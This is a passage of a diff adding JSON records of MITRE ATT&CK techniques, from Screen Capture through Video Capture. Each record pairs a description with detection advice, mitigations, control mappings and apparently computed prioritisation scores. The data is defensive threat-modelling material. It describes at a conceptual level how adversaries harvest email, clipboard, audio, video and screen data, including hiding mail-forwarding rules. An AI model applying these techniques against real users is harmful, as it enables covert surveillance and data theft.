+            "detection_score": 1
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 1
+    },
+    {
+        "tid": "T1113",
+        "name": "Screen Capture",
+        "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)\n",
+        "url": "https://attack.mitre.org/techniques/T1113",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.3589895276190476,
+        "adjusted_score": 0.3589895276190476,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.047619047619047616,
+            "detection_score": 0.1
+        },
+        "choke_point_score": 0.25,
+        "prevalence_score": 0.06137048
+    },
+    {
+        "tid": "T1114",
+        "name": "Email Collection",
+        "description": "Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. ",
+        "url": "https://attack.mitre.org/techniques/T1114",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.\n\nFile access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.\n\nMonitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nDetection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.",
+        "platforms": [
+            "Google Workspace",
+            "Linux",
+            "Office 365",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Command: Command Execution",
+            "File: File Access",
+            "Logon Session: Logon Session Creation",
+            "Network Traffic: Network Connection Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1114.001",
+                "name": "Email Collection: Local Email Collection",
+                "url": "https://attack.mitre.org/techniques/T1114/001",
+                "description": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.\n\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\\\Documents\\Outlook Files` or `C:\\Users\\\\AppData\\Local\\Microsoft\\Outlook`.(Citation: Microsoft Outlook Files)",
+                "detection": "Monitor processes and command-line arguments for actions that could be taken to gather local email files. Monitor for unusual processes accessing local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+                "mitigations": [
+                    {
+                        "mid": "M1041",
+                        "name": "Encrypt Sensitive Information",
+                        "description": "Protect sensitive information with strong encryption.",
+                        "url": "https://attack.mitre.org/mitigations/M1041"
+                    }
+                ]
+            },
+            {
+                "tid": "T1114.002",
+                "name": "Email Collection: Remote Email Collection",
+                "url": "https://attack.mitre.org/techniques/T1114/002",
+                "description": "Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.",
+                "detection": "Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).",
+                "mitigations": [
+                    {
+                        "mid": "M1041",
+                        "name": "Encrypt Sensitive Information",
+                        "description": "Protect sensitive information with strong encryption.",
+                        "url": "https://attack.mitre.org/mitigations/M1041"
+                    },
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    }
+                ]
+            },
+            {
+                "tid": "T1114.003",
+                "name": "Email Collection: Email Forwarding Rule",
+                "url": "https://attack.mitre.org/techniques/T1114/003",
+                "description": "Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)\n\nAny user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)",
+                "detection": "Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1041",
+                        "name": "Encrypt Sensitive Information",
+                        "description": "Protect sensitive information with strong encryption.",
+                        "url": "https://attack.mitre.org/mitigations/M1041"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
+            },
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            }
+        ],
+        "cumulative_score": 0.4523809523809524,
+        "adjusted_score": 0.4523809523809524,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "6.3",
+            "6.5",
+            "18.3",
+            "18.5",
+            "3.10"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-19",
+            "AC-20",
+            "AC-3",
+            "AC-4",
+            "CM-2",
+            "CM-6",
+            "IA-2",
+            "IA-5",
+            "SC-7",
+            "SI-12",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.2523809523809524,
+            "mitigation_score": 0.34545454545454546,
+            "detection_score": 0.15
+        },
+        "choke_point_score": 0.2,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1114.001",
+        "name": "Email Collection: Local Email Collection",
+        "description": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.\n\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\\\Documents\\Outlook Files` or `C:\\Users\\\\AppData\\Local\\Microsoft\\Outlook`.(Citation: Microsoft Outlook Files)",
+        "url": "https://attack.mitre.org/techniques/T1114/001",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "Monitor processes and command-line arguments for actions that could be taken to gather local email files. Monitor for unusual processes accessing local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1114",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
+            }
+        ],
+        "cumulative_score": 0.2,
+        "adjusted_score": 0.2,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.1"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-19",
+            "AC-20",
+            "AC-4",
+            "SI-12",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1114.002",
+        "name": "Email Collection: Remote Email Collection",
+        "description": "Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.",
+        "url": "https://attack.mitre.org/techniques/T1114/002",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).",
+        "platforms": [
+            "Google Workspace",
+            "Office 365",
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Logon Session: Logon Session Creation",
+            "Network Traffic: Network Connection Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1114",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
+            },
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            }
+        ],
+        "cumulative_score": 0.28095238095238095,
+        "adjusted_score": 0.28095238095238095,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "6.3",
+            "6.4",
+            "6.5",
+            "3.10"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-19",
+            "AC-20",
+            "AC-3",
+            "AC-4",
+            "CM-2",
+            "CM-6",
+            "IA-2",
+            "IA-5",
+            "SI-12",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1114.003",
+        "name": "Email Collection: Email Forwarding Rule",
+        "description": "Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)\n\nAny user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)",
+        "url": "https://attack.mitre.org/techniques/T1114/003",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.",
+        "platforms": [
+            "Google Workspace",
+            "Linux",
+            "Office 365",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1114",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
+            }
+        ],
+        "cumulative_score": 0.24761904761904763,
+        "adjusted_score": 0.24761904761904763,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "18.3",
+            "18.5",
+            "3.10"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-19",
+            "AC-20",
+            "AC-4",
+            "CM-6",
+            "SC-43",
+            "SC-7",
+            "SI-12",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1115",
+        "name": "Clipboard Data",
+        "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nIn Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, pbpaste, to grab clipboard contents.(Citation: Operating with EmPyre)",
+        "url": "https://attack.mitre.org/techniques/T1115",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.1380952380952381,
+        "adjusted_score": 0.1380952380952381,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.03809523809523809,
+            "detection_score": 0.08
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1119",
+        "name": "Automated Collection",
+        "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.",
+        "url": "https://attack.mitre.org/techniques/T1119",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "Script: Script Execution"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
+            },
+            {
+                "mid": "M1029",
+                "name": "Remote Data Storage",
+                "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.",
+                "url": "https://attack.mitre.org/mitigations/M1029"
+            }
+        ],
+        "cumulative_score": 0.3203063442857143,
+        "adjusted_score": 0.3203063442857143,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "3.11",
+            "11.4",
+            "12.8"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
+            "AC-20",
+            "CM-2",
+            "CM-6",
+            "CM-8",
+            "CP-6",
+            "CP-7",
+            "CP-9",
+            "SC-36",
+            "SC-4",
+            "SI-12",
+            "SI-23",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.2142857142857143,
+            "mitigation_score": 0.36363636363636365,
+            "detection_score": 0.05
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00602063
+    },
+    {
+        "tid": "T1120",
+        "name": "Peripheral Device Discovery",
+        "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.",
+        "url": "https://attack.mitre.org/techniques/T1120",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "platforms": [
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.11826443428571429,
+        "adjusted_score": 0.11826443428571429,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.014285714285714284,
+            "detection_score": 0.03
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00397872
+    },
+    {
+        "tid": "T1123",
+        "name": "Audio Capture",
+        "description": "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.",
+        "url": "https://attack.mitre.org/techniques/T1123",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.13333333333333333,
+        "adjusted_score": 0.13333333333333333,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.03333333333333333,
+            "detection_score": 0.07
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1124",
+        "name": "System Time Discovery",
+        "description": "An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)\n\nSystem time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\\\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. (Citation: Technet Windows Time Service)\n\nThis information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)",
+        "url": "https://attack.mitre.org/techniques/T1124",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.11904761904761905,
+        "adjusted_score": 0.11904761904761905,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.019047619047619046,
+            "detection_score": 0.04
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1125",
+        "name": "Video Capture",
+        "description": "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.\n\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)",
+        "url": "https://attack.mitre.org/techniques/T1125",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.",
+        "platforms": [
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.10476190476190476,
+        "adjusted_score": 0.10476190476190476,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.0047619047619047615,
+            "detection_score": 0.01
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1127",
+        "name": "Trusted Developer Utilities Proxy Execution",
